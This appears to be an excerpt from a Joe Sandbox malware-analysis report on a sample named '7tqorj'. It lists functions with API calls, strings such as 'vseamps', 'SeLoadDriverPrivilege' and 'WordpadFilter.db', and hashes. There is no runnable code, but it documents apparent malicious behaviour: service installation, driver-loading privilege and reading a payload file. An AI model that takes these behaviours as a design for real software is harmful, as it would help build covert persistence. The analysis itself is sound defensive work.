Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

l, xrefs: 0000000140005F87
t, xrefs: 0000000140005F73
p, xrefs: 0000000140005EB1
l, xrefs: 0000000140005F82
., xrefs: 0000000140005F78
t, xrefs: 0000000140005EF1
a, xrefs: 0000000140005F96
M, xrefs: 0000000140005E99
o, xrefs: 0000000140005FA5
s, xrefs: 0000000140005EA1
l, xrefs: 0000000140005F9B
., xrefs: 0000000140005ED9
c, xrefs: 0000000140005F69
l, xrefs: 0000000140005FA0
v, xrefs: 0000000140005F64
a, xrefs: 0000000140005EE9
d, xrefs: 0000000140005EE1
s, xrefs: 0000000140005F5F
i, xrefs: 0000000140005EC1
d, xrefs: 0000000140005F7D
r, xrefs: 0000000140005F6E
L, xrefs: 0000000140005EB9
t, xrefs: 0000000140005ED1
s, xrefs: 0000000140005EC9
M, xrefs: 0000000140005EA9
m, xrefs: 0000000140005F91
m, xrefs: 0000000140005F5A
c, xrefs: 0000000140005FAA

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFDA5801C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDA5801C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDA5801C7A
_RTC_Initialize.LIBCMT ref: 00007FFDA5801CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDA5801CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFDA5801CF9

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: 02d09f5c6657c9baff9acf7620da907f915e7ffb855c764fda22da53ce31e26c
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: B381D021F0B64B46F664AB7698713796290BF47F90F0442B5EA4E477D3DE7CE4468308

Function 00007FFDA5801720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFDA5801753
FreeLibrary.KERNEL32 ref: 00007FFDA5801981

Part of subcall function 00007FFDA5801B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDA5801BC0
Part of subcall function 00007FFDA5801B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDA5801BC6

Part of subcall function 00007FFDA5801720: FindFirstFileA.KERNELBASE ref: 00007FFDA5801536

Strings

WordpadFilter.db, xrefs: 00007FFDA5801527

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 9d1570ae14eff48e6b5a10e09d5430b5a894d92959e290bb6ccc5acace6caf62
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: E7317C32B16B4589E700DBB1D8603AD73A5FB89B88F144675EE8D13B46EF38D151C344

Function 00007FFDA58011B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDA58014EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDA58014F7

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: f93ddd4b1d4e65f296a6983b5260eee663fd3e40ef209ac76df1cb99e322a264
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: B7813A23B1AA8A46E6118B3598502B9A794FF57FD4F148335EF5953793DF3CE0918304

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

null, xrefs: 0000000140003FCE
SeLoadDriverPrivilege, xrefs: 000000014000402A
ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

vseamps, xrefs: 0000000140001538
/service, xrefs: 000000014000153F
/remove, xrefs: 000000014000157E

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

USER32.DLL, xrefs: 000000014000F03B
GetUserObjectInformationA, xrefs: 000000014000F0E9
GetProcessWindowStation, xrefs: 000000014000F10D
GetLastActivePopup, xrefs: 000000014000F094
MessageBoxA, xrefs: 000000014000F054
GetActiveWindow, xrefs: 000000014000F075

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

<program name unknown>, xrefs: 00000001400093D9
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
Runtime Error!Program: , xrefs: 000000014000938D
..., xrefs: 0000000140009431

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

